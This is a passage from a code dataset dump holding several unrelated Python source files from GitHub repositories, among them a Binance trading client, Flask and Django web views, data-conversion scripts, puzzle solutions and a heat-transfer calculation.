obj['タイトル']).translate(\n str.maketrans({chr(0xFF01 + i): chr(0x21 + i) for i in range(94)}))\n f = '%Y年%m月%d日'\n r = obj['公開年月日']\n if '月' not in r:\n r += '1月'\n if '日' not in r:\n r += '1日'\n date = datetime.datetime.strptime(r, f)\n release_date = f'{date.date()}'\n if title in titles:\n if release_date not in titles[title]:\n titles[title].append(release_date)\n if title not in titles:\n titles[title] = [release_date]\n\n with open('../trim/jcdb_after2003.jsonlines') as f:\n for row in f.readlines():\n obj = json.loads(row)\n title = re.sub(regexp, \"\", obj['タイトル']).translate(\n str.maketrans({chr(0xFF01 + i): chr(0x21 + i) for i in range(94)}))\n release_date = obj['公開年月日'].replace(\n '年', '-').replace('月', '-').replace('日', '')\n if title in titles:\n if release_date not in titles[title]:\n titles[title].append(release_date)\n if title not in titles:\n titles[title] = [release_date]\n\n with open('titles.json', mode='w', encoding='utf_8') as f:\n json.dump(titles, f, ensure_ascii=False)\n\n\ndef create_better_revenue():\n with open('income.json', encoding='utf_8') as f_r:\n data = json.load(f_r)\n for year in data.keys():\n for d in data[year]:\n releaseDate = d['releaseDate']\n if len(releaseDate) == 6:\n d['releaseDate'] = releaseDate[:5] + '0' + releaseDate[5:]\n d['title'] = re.sub(regexp, \"\", d['title']).translate(\n str.maketrans({chr(0xFF01 + i): chr(0x21 + i) for i in range(94)}))\n with open('revenue_better_date.json', mode='w', encoding='utf_8') as f_w:\n json.dump(data, f_w, ensure_ascii=False)\n\n\ndef search():\n revenue = None\n titles = None\n revenue_count = 0\n count = 0\n title_not_included = []\n same_title_different_date = []\n with open('./revenue_better_date.json') as fi:\n revenue = json.load(fi)\n with open('./titles.json') as ft:\n titles = json.load(ft)\n for year in revenue.keys():\n for item in revenue[year]:\n revenue_count += 1\n title = item['title']\n release_date = item['releaseDate']\n if title in titles:\n t = []\n for d in titles[title]:\n t.append(d[:7])\n if release_date in t:\n count += 1\n else:\n same_title_different_date.append(\n {'title': title, 'revenue_date': release_date, 'detected_date': titles[title]})\n else:\n title_not_included.append(title)\n\n print('\\ntitles not included')\n pprint.pprint(title_not_included)\n print('\\ntitles same title different date')\n pprint.pprint(same_title_different_date)\n print('rate', count / revenue_count)\n print('included count', count)\n print('revenue count', revenue_count)\n print('titles not included count:', len(title_not_included))\n print('titles same title different date count:',\n len(same_title_different_date))\n\n\ncreate_titles()\ncreate_better_revenue()\nsearch()\n","repo_name":"vdslab/JFDb-scraper","sub_path":"src/revenue_include_rate.py","file_name":"revenue_include_rate.py","file_ext":"py","file_size_in_byte":3881,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"16292633643","text":"# This file is modified from https://github.com/openbenchmark/BARS/blob/master/ctr_prediction/datasets/Criteo/Criteo_x1/convert_criteo_x1.py\n# to crop and convert libsvm data to csv data\n\nimport pandas as pd\nfrom pathlib import Path\nimport gc\n\nheaders = [\"label\", \"I1\", \"I2\", \"I3\", \"I4\", \"I5\", \"I6\", \"I7\", \"I8\", \"I9\", \"I10\",\n \"I11\", \"I12\", \"I13\", \"C1\", \"C2\", \"C3\", \"C4\", \"C5\", \"C6\", \"C7\", \"C8\", \"C9\", \"C10\",\n \"C11\", \"C12\", \"C13\", \"C14\", \"C15\", \"C16\", \"C17\", \"C18\", \"C19\", \"C20\", \"C21\", \"C22\", \n \"C23\", \"C24\", \"C25\", \"C26\"]\n\ndata_files = [\"train.libsvm\", \"test.libsvm\", \"valid.libsvm\"]\nlengths = [150000, 50000, 30000] \n\nfor f, len in zip(data_files, lengths):\n df = pd.read_csv(f, sep=\" \", names=headers, nrows=len)\n for col in headers[1:]:\n if col.startswith(\"I\"):\n df[col] = df[col].apply(lambda x: x.split(':')[-1])\n elif col.startswith(\"C\"):\n df[col] = df[col].apply(lambda x: x.split(':')[0])\n df.to_csv(Path(f).stem + \".csv\", index=False)\n del df\n gc.collect()\n","repo_name":"N2-Sys/SK-Gradient","sub_path":"examples/CTR-prediction/data/convert.py","file_name":"convert.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"24142839050","text":"import hashlib\n\ndef is_door(c):\n if c in ['b','c','d','e','f']:\n return True\n else:\n return False\n\ndef move(pos, dir):\n if dir == 'U':\n return pos[0], pos[1]-1\n elif dir == 'D':\n return pos[0], pos[1]+1\n elif dir == 'L':\n return pos[0]-1, pos[1]\n else:\n return pos[0]+1, pos[1]\n\ndef can_move(pos, dir):\n return (dir == 'U' and pos[1] > 0) or (dir == 'D' and pos[1] < 3) or (dir == 'L' and pos[0] > 0) or (dir == 'R' and pos[0] < 3)\n\ndef set_doors(code, walk):\n s = code + ''.join(walk)\n m = hashlib.new('md5')\n key = f\"{s}\"\n m.update(str.encode(key))\n md5hash = m.hexdigest()\n\n doors = {\n 'U': is_door(md5hash[0]),\n 'D': is_door(md5hash[1]),\n 'L': is_door(md5hash[2]),\n 'R': is_door(md5hash[3]),\n }\n return doors\n\ninput = 'udskfozm'\nfailed_walks = []\ngood_walks = []\ndone = False\n\ndef bfs_search(start, goal):\n queue = [(start, [])]\n while queue:\n # print(f\"Queue looks like: {queue}\")\n pos, path = queue.pop(0)\n next_doors = set_doors(input, path)\n for dir in [x for x in next_doors.keys() if next_doors[x]]:\n if list(next_doors.values()).count(True) == 0:\n # dead end\n # print(f\"Found dead end: {path}\")\n pass\n elif move(pos,dir) == goal:\n # got to goal\n yield path + [dir]\n elif can_move(pos, dir):\n # move to next\n queue.append((move(pos, dir), path + [dir]))\n else:\n pass\n # print(f\"Found dead end: {path}\")\n\npaths = list(bfs_search((0,0),(3,3)))\npaths.sort(key = lambda s: len(s))\nprint(f\"Part one: {''.join(paths[0])}\")\nprint(f\"Part two: {len(paths[len(paths)-1])}\")\n\n","repo_name":"mrbarge/aoc2016","sub_path":"python/day17.py","file_name":"day17.py","file_ext":"py","file_size_in_byte":1803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"41980382546","text":"class cls_binance():\n def __init__(self, api_key=None,secret_key=None, debug=False, asset='BTC', symbol = 'BTCUSDT'):\n if debug: print('[DEBUG]',f'binance_class().__init__(debug={debug},api_key={api_key},secret_key={secret_key})', )\n from binance.client import Client as Clibin\n self.api_key = api_key\n self.secret_key = secret_key\n self.debug = debug\n self.asset = asset.upper()\n self.symbol = symbol\n try:\n self.client = Clibin(api_key, secret_key)\n except binance.exceptions.BinanceAPIException:\n self.client = Clibin(api_key, secret_key)\n except:\n print('Что то пошло не так.')\n self.time()\n def time(self):\n '''\n проверка синхронности времени сервера и локального времени.\n (если у Вас высокая латентность сети, будут возникать ошибка \"Необходима синхронизация времени.\")\n :return:\n '''\n from time import time, sleep\n server_time = self.client.get_server_time()\n local = int(time())\n binance = int(server_time['serverTime'] / 1000)\n residual = binance - local\n if abs(residual) > 1:\n print('residual:',residual)\n print('Выполните комманды: (в cmd.exe с правами администратора)')\n print('net start w32time')\n print('w32tm /resync')\n raise Exception(\"Необходима синхронизация времени.\")\n else:\n if self.debug: print('Время сервера и локальное время синхронны. \\n')\n def get_deposit_history(self,asset=None,last=True):\n '''\n Запрос списка входящих транзакций.\n :param self:\n :return:\n '''\n if asset is None:\n asset = self.asset.upper()\n self.depositList = self.client.get_deposit_history(asset=asset.upper())['depositList']\n if self.debug: print('[DEBUG]','self.depositList:',self.depositList)\n if self.depositList == []:\n self.depositList = {'asset': self.asset.upper(), 'amount': 'None','insertTime': 1000}\n else:\n if last:\n self.depositList = self.depositList[0]\n else:\n pass\n return self.depositList\n def get_asset_balance(self, asset=None):\n '''\n Запрос баланса актива \n :param self:\n :param asset: код актива (например \"BTC\")\n :return:\n '''\n if asset is None: asset = self.asset\n if self.debug: print('[DEBUG]','self.depositList:', self.depositList)\n self.balance = self.client.get_asset_balance(asset=asset)\n if self.balance is None:\n self.balance = {'free': 'None','locked': 'None'}\n return self.balance\n def order_market_sell_all(self, symbol=None):\n '''\n Продажа всего актива.\n :param self:\n :param symbol: тикер (например: BTCUSDT, продаём BTC - покупаем USDT)\n :return:\n '''\n if symbol is None: symbol = self.symbol\n free = self.balance['free']\n self.order_market = self.client.order_market_sell(symbol=symbol,quantity=float(str(free)[:8]))\n return self.order_market\n def order_market_sell(self, symbol=None,quantity=None):\n '''\n Продажа quantity актива.\n :param self:\n :param symbol: тикер (например: BTCUSDT, продаём BTC - покупаем USDT)\n :return:\n '''\n if symbol is None: symbol = self.symbol\n try:\n self.order_market = self.client.order_market_sell(symbol=symbol,quantity=quantity)\n return [True,self.order_market]\n except:\n print(f\"[ERROR] mod_binance.cls_binance().order_market_sell(symbol={symbol},quantity={quantity}).except:\")\n self.balance = self.client.get_asset_balance(asset=symbol[:3])\n return [False,self.balance]\n def incoming(self,dbl):\n from time import time as t\n for el in dbl:\n if dbl[el]['incoming'] == {}:\n dbl[el]['incoming'].update({'requestTime': int(t())})\n dbl[el]['incoming'].update(self.client.get_asset_balance(asset=el))\n if dbl.get('USDT') is None:\n dbl.update({'USDT':{'incoming':self.client.get_asset_balance(asset='USDT')}})\n dbl['USDT']['incoming'].update({'requestTime': int(t())})\n return dbl\n def outgoing(self,dbl):\n from time import time as t\n for el in dbl:\n if dbl[el]['outgoing'] == {}:\n dbl[el]['outgoing'].update({'requestTime': int(t())})\n dbl[el]['outgoing'].update(self.client.get_asset_balance(asset=el))\n if dbl.get('USDT') is None:\n dbl.update({'USDT':{'outgoing':self.client.get_asset_balance(asset='USDT')}})\n dbl['USDT']['outgoing'].update({'requestTime': int(t())})\n return dbl\n\nif __name__ == '__main__':\n pass","repo_name":"VBCRFV/python_3","sub_path":"trade/binance/rent/mod_binance.py","file_name":"mod_binance.py","file_ext":"py","file_size_in_byte":5291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"4429795513","text":"n = int(input(\"enter time in hours\"))\nn1 = int(input(\"enter time in minutes\"))\n\nif n>=5 and n<=23:\n if n1>=30 and n1<=59:\n GMTh = n-5 #GMTh means Greenwich mean time in hours\n GMTm = n1-30 #GMTm means Greenwich mean time in minutes\n print(\"GMT=\", GMTh,\":\",GMTm)\n elif n1<=30 and n1>=0:\n GMTh = n-6\n GMTm = n1+30\n print(\"GMT=\",GMTh,\":\",GMTm)\n else:\n print(\"time not valid\")\nelif n<=5 and n>=0:\n if n1>=30 and n1<=59:\n GMTh = 24-5+n\n GMTm = 30+n1\n print(\"GMT=\",GMTh,\":\",GMTm)\n elif n1<=30:\n GMTh=24-6+n\n GMTm=30+n1\n print(\"GMT=\",GMTh,\":\",GMTm)\n elif n1<=0 and n1>=59:\n print(\"time not valid\")\n else:\n print(\"time not valid\")\n\nelse:\n print(\"time not valid\")\n\n\n\nontarioh = GMTh - 5 #ontarioh means time in ontrio in hours\nontariom = GMTm - 0 #ontarioh means time in ontrio in minutes\n\nprint(\"Time in Toronto,Ontario = \",ontarioh,\":\",ontariom)\n","repo_name":"sumant-khanna/python-practice-Sumant","sub_path":"timezone-conversion-toronto.py","file_name":"timezone-conversion-toronto.py","file_ext":"py","file_size_in_byte":1038,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"13249033143","text":"#!/usr/bin/env python\nfrom flask import Blueprint, jsonify, request\nimport services.sensors_service as sensors_service\nfrom models.sensors import Sensors\nfrom werkzeug.exceptions import HTTPException\nfrom flask_jwt_extended import jwt_required\nimport json\n\nbp_sensors = Blueprint('sensors', 'sensors')\n\n@bp_sensors.route('/sensors', methods=['GET'])\n@jwt_required()\ndef api_get():\n sensors = sensors_service.get()\n return jsonify([sensors.as_dict() for sensors in sensors])\n\n@bp_sensors.route('/sensors', methods=['POST'])\n@jwt_required()\ndef api_post():\n sensors = sensors_service.post(request.json)\n return jsonify(sensors.as_dict())\n\n@bp_sensors.route('/sensors/', methods=['PUT'])\n@jwt_required()\ndef api_put(id):\n body = request.json\n body['id'] = id\n res = sensors_service.put(body)\n return jsonify(res.as_dict()) if isinstance(res, Sensors) else jsonify(res)\n\n@bp_sensors.route('/sensors/', methods=['DELETE'])\n@jwt_required()\ndef api_delete(id):\n res = sensors_service.delete(id)\n return jsonify(res)\n\n@bp_sensors.errorhandler(HTTPException)\ndef handle_exception(e):\n response = e.get_response()\n response.data = json.dumps({\n 'success': False,\n \"message\": e.description\n })\n response.content_type = \"application/json\"\n return response","repo_name":"tprod/logipeet","sub_path":"API/app/controllers/sensors_controller.py","file_name":"sensors_controller.py","file_ext":"py","file_size_in_byte":1324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"14294767954","text":"from django.http import HttpResponse, HttpRequest, JsonResponse\nfrom django.shortcuts import render, redirect\nfrom django.views.decorators.csrf import csrf_protect\nfrom django.utils.html import escape\nfrom django.forms.models import model_to_dict\nfrom .models import Page, Post, BaseUser, Logger, BlogType\n\n\ndef index(request: HttpRequest) -> HttpResponse:\n try:\n if request.method != 'GET' or not request.user.is_authenticated:\n return render_4xx(request)\n else:\n context = {\n 'page_data': Page.objects.get(name='index'),\n 'posts': Post.objects.filter(author=BaseUser.objects.get(user=request.user)).order_by('-id')[:6]\n }\n request.session['location'] = 'index'\n return render(request, 'blog/index.html', context)\n except Exception as PythonException:\n print(PythonException)\n return render_4xx(request)\n\n\ndef posts(request: HttpRequest) -> HttpResponse:\n try:\n if request.method != 'GET':\n return render_4xx(request)\n context = {\n 'page_data': Page.objects.get(name='posts'),\n 'posts': Post.objects.filter(author=BaseUser.objects.get(user=request.user)).order_by('-id')[:9]\n }\n request.session['location'] = 'posts'\n return render(request, 'blog/posts.html', context)\n except Exception as PythonException:\n print(PythonException)\n return render_4xx(request)\n\n\ndef details(request: HttpRequest, post_id: int):\n context = {\n 'page_data': Page.objects.get(name='details'),\n 'post': Post.objects.get(pk=post_id)\n }\n request.session['location'] = 'details'\n request.session['post'] = post_id\n return render(request, 'blog/details.html', context)\n\n\ndef new(request) -> HttpResponse:\n if request.method == 'GET':\n context = {\n 'page_data': Page.objects.get(name='new'),\n 'categories': BlogType.objects.all()\n }\n return render(request, 'blog/new.html', context)\n elif request.method == 'POST':\n if not request.POST['title'] and request.POST['content'] or not request.user.is_authenticated:\n return render_4xx(request)\n print(request.POST['content'])\n new_post = Post(\n author=BaseUser.objects.get(user=request.user),\n title=escape(request.POST['title']),\n content=escape(request.POST['content']),\n category=BlogType.objects.get(id=escape(request.POST['category']))\n )\n new_post.save()\n if request.session['location'] == 'details' and request.session['post']:\n return redirect(request.session['location'], request.session['post'])\n return redirect(request.session['location'] if request.session['location'] else 'index')\n else:\n return render_4xx(request)\n\n\n@csrf_protect\ndef delete(request: HttpRequest, post_id: int) -> JsonResponse:\n if request.method == 'POST' and request.headers['X-Csrftoken'] and 'csrftoken' in request.headers['Cookie']:\n Post.objects.get(pk=post_id).delete()\n return JsonResponse({\n 'success': 'true',\n 'message': 'The post has been deleted!'\n })\n return JsonResponse({'res': 'YES'})\n\n\ndef edit(request: HttpRequest, post_id: int) -> HttpResponse:\n context = {'page_data': Page.objects.get(name='edit')}\n if request.method == 'GET':\n post = Post.objects.get(id=post_id)\n categories = BlogType.objects.all()\n context['post'] = post\n context['categories'] = categories\n return render(request, 'blog/edit.html', context)\n elif request.method == 'POST':\n if not request.POST['title'] and request.POST['content'] or not request.user.is_authenticated:\n return render_4xx(request)\n post = Post.objects.get(id=post_id)\n if len(request.POST['title']) < 3:\n context['post'] = post\n context['errors'] = {'title': 'Title must be at least 3 characters long.'}\n context['categories'] = BlogType.objects.all()\n return render(request, 'blog/edit.html', context)\n post.update_post(escape(request.POST['title']), escape(request.POST['content']), BlogType.objects.get(id=escape(request.POST['category'])))\n return redirect('details', post_id)\n else:\n return render_4xx(request)\n\n\ndef search(request: HttpRequest) -> HttpResponse:\n if request.method != 'GET':\n return render_4xx(request, message='Oops! Wrong request!')\n search_input = request.GET.get('s', '')\n if search_input:\n posts_list = Post.objects.filter(title__icontains=search_input)\n if posts_list:\n context = {\n 'posts': posts_list,\n 'page_data': Page.objects.get(name='search')\n }\n return render(request, 'blog/search.html', context)\n return render_4xx(request, message='No posts found! Try something else!')\n return render_4xx(request, message='Oops! Something went wrong while processing the request, try again.')\n\n\n#Ajax\ndef get_posts(request):\n if request.method == 'GET' and int(request.GET.get('current', 0)) > 0:\n initial_posts = int(request.GET.get('current'))\n print(request.user)\n all_posts = Post.objects.filter(author=BaseUser.objects.get(user=request.user)).order_by('-id')[initial_posts:initial_posts+9].values()\n if all_posts:\n print('cas')\n return JsonResponse({\n 'posts': list(all_posts)\n })\n print('asdasds')\n return JsonResponse({\n 'error': 'error'\n })\n return JsonResponse({\n 'id': 'test1',\n 'title': 'test',\n 'content': 'test2',\n 'author': 'test3',\n 'creation': 'test4'\n })\n\n\ndef render_4xx(request: HttpRequest, message: str = 'The request could not be processed, please try again later.') -> HttpResponse:\n return render(request, 'error/4xx_error.html', {'message': message})\n\n\ndef decode_request_body(request_body):\n return decoded_request_to_string(request_body.decode('utf-8'))\n\n\ndef decoded_request_to_string(decoded_request):\n return decoded_request.replace('\"', '')\n","repo_name":"HernanGC/SelfBlog","sub_path":"Blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"72085867562","text":"def sanitize(time_string):\n\t\"\"\"\n\tThe sanitize function takes an input list of times and\n\tunifies the time data format, so that all list entries\n\thave the same format.\n\t\"\"\"\n\tif '-' in time_string:\n\t\tsplitter = '-'\n\telif ':' in time_string:\n\t\tsplitter = ':'\n\telse:\n\t\treturn(time_string)\n\n\t(mins, secs) = time_string.split(splitter)\n\treturn(mins + '.' + secs)\n\ndef get_coach_data(filename):\n\ttry:\n\t\twith open(filename) as f:\n\t\t\tdata = f.readline()\n\t\treturn(data.strip().split(','))\n\texcept IOError as ioerr:\n\t\tprint('File error' + str(ioerr))\n\t\treturn(none)\n\nprint(sorted(set([sanitize(t) for t in get_coach_data('james.txt')]))[0:3])\nprint(sorted(set([sanitize(t) for t in get_coach_data('julie.txt')]))[0:3])\nprint(sorted(set([sanitize(t) for t in get_coach_data('mikey.txt')]))[0:3])\nprint(sorted(set([sanitize(t) for t in get_coach_data('sarah.txt')]))[0:3])\n","repo_name":"domantascibas/head_first_python","sub_path":"chapter5/u10.py","file_name":"u10.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"73086905322","text":"import logging\nfrom typing import List\n\nfrom common.normalizers import normalize_to_bool, normalize_to_str\n\nfrom .input_group import InputGroup\n\nlogger = logging.getLogger(__name__)\n\n\ntype_to_normalizer = {\n \"integer\": int,\n \"decimal\": float,\n \"unsignedInt\": int,\n \"positiveInt\": int,\n \"boolean\": normalize_to_bool,\n}\n\n\nclass Attribute:\n def __init__(\n self,\n path,\n definition_id: str = None,\n input_groups: List[InputGroup] = None,\n ):\n self.path = path\n self.input_groups = input_groups or []\n self.type = definition_id\n self.normalizer = type_to_normalizer.get(definition_id, normalize_to_str)\n\n def __eq__(self, other):\n if not isinstance(other, Attribute):\n return False\n return self.path == other.path and self.input_groups == other.input_groups\n\n def __str__(self):\n return f\"path: {self.path}, groups: {self.input_groups}\"\n\n def __hash__(self):\n return hash(\"{self.path}{self.input_groups}\")\n\n def add_input_group(self, new_group):\n self.input_groups.append(new_group)\n\n def cast_type(self, value):\n if value is None:\n return None\n\n try:\n return self.normalizer(value)\n except Exception as e:\n logger.warning(\n f\"Could not cast value {value} to type {self.type} on attribute at path = {self.path}): {e}\"\n )\n\n return value\n","repo_name":"arkhn/fhir-river","sub_path":"django/river/common/analyzer/attribute.py","file_name":"attribute.py","file_ext":"py","file_size_in_byte":1456,"program_lang":"python","lang":"en","doc_type":"code","stars":42,"dataset":"github-code","pt":"19"} +{"seq_id":"23099229418","text":"class Solution(object):\n def productExceptSelf(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: List[int]\n \"\"\"\n zero_num = len(filter(lambda x:x==0,nums))\n if zero_num == 0:\n pro = reduce(lambda x,y:x*y,nums)\n return map(lambda x:pro/x,nums)\n elif zero_num == 1:\n pro = reduce(lambda x,y:x*y,filter(lambda x:x!=0,nums))\n return map(lambda x:0 if x!=0 else pro,nums)\n else:\n return [0]*len(nums)","repo_name":"duduscript/leetcode","sub_path":"238/ProductofArrayExceptSelf.py","file_name":"ProductofArrayExceptSelf.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"19"} +{"seq_id":"28867132887","text":"\nfrom src.coverage_thresholds.coverage_threshold import CoverageThreshold\n\n\nclass LowerCoverageThreshold(CoverageThreshold):\n # Class represents coverage thresholds for annotating low-coverage regions.\n\n def __init__(self, cov_threshold_value: int) -> None:\n if cov_threshold_value < 0:\n raise ValueError(\n 'Negative value passed to constructor of class '\n f'`{self.__class__}`: `{cov_threshold_value}`'\n )\n # end if\n\n self._value: int = cov_threshold_value\n\n # Zero coverage requires different label\n self._label: str\n if self._value == 0:\n self._label = 'zero coverage'\n else:\n self._label = f'coverage < {self._value}'\n # end if\n # end def\n\n def test_coverage(self, cov: int) -> bool:\n # Function checks if current coverage `cov` is below our threshold\n\n # Zero coverage requires different behaviour\n if self._value != 0:\n return cov < self._value\n else:\n return cov == 0\n # end if\n # end def\n\n def __repr__(self):\n return f''\n # end def\n# end class\n","repo_name":"masikol/consensus-highlighter","sub_path":"src/coverage_thresholds/lower_coverage_threshold.py","file_name":"lower_coverage_threshold.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"30718272527","text":"\"\"\"\nthe following open source traces have issuse, the beginning of the traces have a very long idle perid which is not right, \nwe remove this idle period from the open_source_sort traces \n\ntraces: 10 26 45 50 \n\n\n\"\"\" \n\n\nimport os, sys \nimport time \nfrom collections import defaultdict, Counter, deque \nfrom pprint import pprint \nimport pyzstd\nfrom pyzstd import ZstdFile, CParameter, DParameter, Strategy\n\nzstd_coption = {CParameter.compressionLevel : 16,\n CParameter.enableLongDistanceMatching: 1, \n # CParameter.strategy: Strategy.btopt,\n CParameter.nbWorkers: 8,\n CParameter.checksumFlag : 1}\n\n\ndef remove_head(tracepath, odatapath): \n\n\n if tracepath.endswith(\".zst\") or tracepath.endswith(\".zst.22\"):\n ifile = pyzstd.open(tracepath, \"rt\")\n else:\n ifile = open(tracepath)\n\n if odatapath.endswith(\".zst\") or odatapath.endswith(\".zst.22\"):\n ofile = ZstdFile(odatapath, \"wb\", level_or_option=zstd_coption)\n else:\n ofile = open(odatapath, \"wb\")\n\n\n n_req = 0\n request_de = deque()\n should_remove = True\n first_ts = -1\n for line in ifile:\n n_req += 1\n ls = line.split(\",\")\n if len(ls) != 7:\n ls_tmp = ls[:]\n ls = [ls_tmp[0], \",\".join(ls_tmp[1:-5]), *ls_tmp[-5:]]\n if len(ls) != 7:\n print(\"parse error {} {}\".format(line, ls))\n line = ifile.readline()\n continue\n\n ts, key, klen, vlen, client, op, ttl = ls\n ts, klen, vlen, ttl = int(ts), int(klen), int(vlen), int(ttl)\n request_de.append((ts, line))\n while len(request_de) > 10 and (request_de[-1][0] - request_de[0][0]) > 60:\n request_de.popleft()\n if should_remove:\n if len(request_de) > 100 * 60:\n should_remove = False \n first_ts = ts \n print(\"drop {} requests timestamp {}\".format(n_req, ts))\n else:\n ts -= first_ts\n ofile.write((\",\".join([\"{}\".format(i) for i in [ts, key, klen, vlen, client, op, ttl]]) + \"\\n\").encode(\"ascii\"))\n\n\nif __name__ == \"__main__\":\n tracepath, odatapath = sys.argv[1], sys.argv[2]\n remove_head(tracepath, odatapath)\n\n","repo_name":"1a1a11a/libCacheSim","sub_path":"scripts/priv/traceUtils/customized/twr_remove_head.py","file_name":"twr_remove_head.py","file_ext":"py","file_size_in_byte":2241,"program_lang":"python","lang":"en","doc_type":"code","stars":73,"dataset":"github-code","pt":"19"} +{"seq_id":"12494646952","text":"import numpy as np\nfrom scipy.interpolate import interp1d\nfrom scipy import integrate\nimport matplotlib.pyplot as plt\n\nt0 = 352 + 273.15 # °K (335-415°C Betriebstemperatur)\nt = t0\np = 1 # atm\n# Ordnung für die Eigenschaften: N2, O2, Ar, Benzol\nkomponente = np.array(['N2', 'O2', 'Ar', 'Benzol'])\ny_i = np.array([78,21,1,1.82])/sum(\n np.array([78,21,1,1.82], dtype=float))\nmm_g = np.array([28, 32, 40, 78.11]) # g/mol\n# IG-Eigenschaften\nrho_g = 101325./(8.314*t)*mm_g/1000. # kg/m^3\n# VDI Wärmeatlas - Cv bei 352°C\n# Gasen bei 352°C\ncv_g = np.array([\n (0.7640-0.7500)/(400-350)*(352-400)+0.7640 ,\n (0.795-0.783)/(400-350)*(352-400)+0.795 ,\n 3/2*8.3145/40,\n (2.212-1.991)/(400-300)*(352-400)+2.212 ,\n])\n# kJ/(kg K) = J/g/K\ncp_g = (8.3145+cv_g*mm_g)/mm_g # Nach Idealgasmodell\n# Lennard-Jones Parameter (Bird Tabelle E.1)\nl_j_epsilon_d_k = np.array([99.8,113,122.4,387.]) # K\nl_j_sigma = np.array([3.667,3.433,3.432,5.443]) # Angstrom\nk_t_d_e = t / l_j_epsilon_d_k\n# Stoßintegral (Bird Tabelle E.2)\nstossintegral_k_mu = interp1d(\n [1.60,1.65,5.0, 6.0, 7.0],\n [1.280,1.264,0.9268,0.8962,0.8727]\n)(k_t_d_e)\nkonst_1 = 5 / 16 * np.sqrt(\n 1.3806e-23 * 1000 * 100**2 / 6.022e23 / np.pi\n) * (10**10 / 100)**2 # 1/cm/s\nkonst_2 = (9 / 4 * 8.3145 + cv_g * mm_g\n ) * 1 / 4.184 * konst_1 # cal/cm/s/K\nmu = konst_1 * np.sqrt(mm_g * t) / (\n l_j_sigma**2 * stossintegral_k_mu)*100/1000.\n# g/cm/s * 100cm/1000g * 1kg/m = kg/m/s = Pa s\nk = konst_2 * np.sqrt(t / mm_g) / (\n l_j_sigma**2 * stossintegral_k_mu\n) * 4.184 * 100 # W/m/K\n\ndef phi_alpha_beta(mm_i, mu):\n phi_ab = np.zeros([mm_i.size, mu.size])\n for alpha in range(phi_ab.shape[0]):\n for beta in range(phi_ab.shape[1]):\n phi_ab[alpha, beta] = 1/np.sqrt(8)*(\n 1+mm_i[alpha]/mm_i[beta])**(-1/2.)*(\n 1+(mu[alpha]/mu[beta])**(1/2.)*(\n mm_i[beta]/mm_i[alpha]\n )**(1/4.)\n )**2\n return phi_ab\n\nmu_mix = sum(y_i * mu / phi_alpha_beta(\n mm_g,mu).dot(y_i))\nk_mix = sum(y_i * k / phi_alpha_beta(\n mm_g,k).dot(y_i))\n\n# Eigenschaften als konstant für die Mischung angenommen\nrho_g = (sum(y_i * rho_g/mm_g)*sum(y_i * mm_g)).item()\ncp_g = (sum(y_i * cp_g/mm_g)*sum(y_i * mm_g)).item()\ncv_g = (sum(y_i * cv_g/mm_g)*sum(y_i * mm_g)).item()\nmm_g = sum(y_i * mm_g).item()\nk = k_mix\nmu = mu_mix\nlambda_g = k_mix\n\noutput = [\n 'Prozessstrom, Luft mit verdünntem o-Xylen-Anteil',\n 'mm = ' + '{:g}'.format(mm_g) + ' ' + 'g/mol',\n 'cv_g = ' + '{:g}'.format(cv_g) + ' ' + 'kJ/kg/K' +\n ' (VDI-Wärmeatlas)',\n 'cp_g = ' + '{:g}'.format(cp_g) + ' ' + 'kJ/kg/K' +\n ' ... = (cv_g*M+R)/M Idealgas',\n 'rho_g = ' + '{:g}'.format(rho_g) + ' ' + 'kg/m^3' +\n ' ... Idealgas',\n 'Bird Tabelle E.1: ',\n 'epsilon/k = ' + str(l_j_epsilon_d_k) + ' ' + 'K',\n 'sigma = ' + str(l_j_sigma) + ' ' + 'Angstrom',\n 'Bird Tabelle E.2: ',\n 'Omega_mu=Omega_k = ' + str(\n stossintegral_k_mu) + ' ',\n 'Bird Gl. 1.4-14, 1.4-15, 1.4-16, 9.3-13: ',\n 'mu = ' + '{:g}'.format(mu) + ' ' + 'Pa s',\n 'k = ' + '{:g}'.format(k) + ' ' + 'W/m/K',\n 'k = lambda_g = ' + '{:g}'.format(\n k*1/4.184*60**2) + ' ' + 'kcal/m/h/°C'\n]\nprint('\\n'.join(output))\n\n# Wasser als Kühlmittel: Gesättigte Flüssigkeit bei\n# 230°C, 27,968 bar\nrho_l = 827.12 # kg/m^3\ncp_l = 4.68318 # kJ/kg/K\nlambda_l = 636.6*1e-3 # W/m/K\neta_l = 116.2*1e-6 # Pa s\npr_l = eta_l/(lambda_l/(cp_l*1000)) # [dimlos]\nd_i = 2.54*np.sqrt(2500)/2.6/np.sqrt(33*2)*31.0 / 100 #m\n# Wanddicke und Wärmeleitfähigkeit: St. 35.8. (1.0305)\nw_d = 0.133 * 1 / 12 * 30.48 / 100. # m\nlambda_m = (\n (45 - 50) / (400 - 300) * (352 - 400) + 45\n ) * 1 / 4.184 / 1000. * 60 ** 2 # kcal/h/m^2/K\nre_l = (\n 1/(1/82.7-1/88.9339 - w_d/lambda_m\n )*1000*4.184/60**2 * \\\n d_i/lambda_l/(pr_l**0.333)/0.026)**(1/0.8)\nxi_l = (1.8*np.log10(re_l)-1.5)**(-2.)\nnu_l = xi_l/8.*re_l*pr_l/(\n 1+12.7*np.sqrt(xi_l/8.)*(pr_l**(2/3.)-1)\n)*(1+(0.)**(2/3)) # d_i/l<<1\n# (wesentlich höhere Länge als Durchmesser)\nnu_l = 